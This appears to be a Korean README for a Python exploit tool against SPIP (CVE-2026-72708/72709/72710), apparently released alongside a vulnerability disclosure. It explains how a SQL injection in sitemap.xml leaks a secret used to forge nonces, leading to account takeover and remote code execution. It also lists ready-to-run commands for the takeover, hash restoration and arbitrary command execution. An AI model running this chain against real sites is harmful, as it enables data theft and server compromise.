
SPIP CVE 2026-72708/72709/72710에 대한 Python 익스플로잇 체인으로, 인증되지 않은 SQL 인젝션을 계정 탈취 및 원격 코드 실행으로 연계합니다.
Franck Chevalier (Wayko)가 발견한 CVE-2026-72708, CVE-2026-72709, CVE-2026-72710에 대한 익스플로잇
전체 기술적 심층 분석은 Lexfo 블로그의 전체 글을 참고하세요.
이 저장소는 연구 및 방어적 보안 목적으로만 제공됩니다. 작성자는 이 정보의 오용에 대해 어떠한 책임도 지지 않습니다.
진입점은 공개된 sitemap.xml 페이지의 SQL 인젝션으로, 이를 통해 alea_ephemere를 유출합니다.
이 비밀 값을 이용하면 익명 작업에 대한 유효한 nonce를 위조할 수 있습니다.
여기서부터 RCE로 이어지는 두 가지 작업이 있습니다:
action=editer_auteur 계정 탈취 후, 비공개 영역에서 RCE.action=editer_objet 대량 할당(mass assignment)으로 spip_jobs 큐에 행을 기록한 후, action=cron을 통해 실행.python3 -m venv .venv
.venv/bin/pip install -r requirements.txt
.venv/bin/python3 casse-spip.py --help
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --ato -i 1 -p "Casse-Spip!2026"
덮어쓰기 전에 --ato는 대상의 login과 현재 pass 해시를 (SQLi를 통해) 덤프하므로, 이후 --restore-hash로 복원할 수 있습니다:
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --restore-hash '$2y$12$...' -i 1
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --exploit -c "id"
파일은 IMG/casse-spip_<token>.html에 기록됩니다.